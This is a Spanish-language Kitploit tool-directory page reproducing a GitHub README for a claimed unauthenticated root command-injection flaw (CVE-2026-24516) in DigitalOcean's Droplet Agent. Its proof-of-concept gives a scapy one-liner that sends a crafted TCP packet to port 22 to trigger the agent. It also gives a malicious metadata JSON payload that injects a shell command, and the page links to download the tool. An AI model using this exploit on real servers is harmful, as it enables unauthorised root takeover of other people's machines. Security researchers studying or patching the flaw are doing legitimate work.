Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24516-DigitalOcean-RCE — Vulnerabilidad crítica de RCE pre-autenticación (CVSS 10.0) en DigitalOcean Droplet Agent hasta v1.3.2 mediante inyección de comandos. | Kitploit
Herramientas/GitHubGitHub/poxsky/cve-2026-24516-digitalocean-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubpoxsky/cve-2026-24516-digitalocean-rce

CVE-2026-24516-DigitalOcean-RCE

Vulnerabilidad crítica de RCE pre-autenticación (CVSS 10.0) en DigitalOcean Droplet Agent hasta v1.3.2 mediante inyección de comandos.

Ver Repositorio
1hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-24516-DigitalOcean-RCE

RCE crítico de root sin autenticación (CVSS 10.0) en el Agente Droplet de DigitalOcean hasta v1.3.2 mediante inyección de comandos.

CVE-2026-24516: RCE de root sin autenticación en el Agente Droplet de DigitalOcean

Resumen

Se descubrió una vulnerabilidad crítica de inyección de comandos en el Agente Droplet de DigitalOcean (todas las versiones hasta la 1.3.2 inclusive). Esta falla permite a un atacante lograr Ejecución Remota de Código (RCE) con privilegios de root sin necesidad de autenticación.

Descubridor: Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research

Detalles Técnicos

La vulnerabilidad existe en el componente de acciones de solución de problemas:

  • internal/troubleshooting/actioner/actioner.go
  • internal/troubleshooting/command/exec.go

El agente procesa metadatos del servicio local () y ejecuta comandos del array sin una sanitización adecuada.

169.254.169.254
TroubleshootingAgent.Requesting

El Disparador (Port Knocking)

El agente se activa mediante un paquete TCP específico al puerto 22:

  • SeqNum: 68796879
  • AckNum: 848489

Prueba de Concepto (PoC)

  1. Activar la obtención: python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"

  2. Payload de Metadatos Maliciosos:

    root@kitploit:~
    {
      "troubleshooting_agent": {
        "requesting": ["command:id > /tmp/pwned"]
      }
    }
    

Impacto Puntuación CVSS: 10.0 (Crítico)

Privilegios Requeridos: Ninguno

Resultado: Compromiso Total del Sistema (Acceso Root)

photo_1_2026-03-22_13-46-01 photo_12_2026-03-22_13-46-01 photo_3_2026-03-22_13-46-01 photo_4_2026-03-22_13-46-01 photo_5_2026-03-22_13-46-01 photo_6_2026-03-22_13-46-01

Descargar herramienta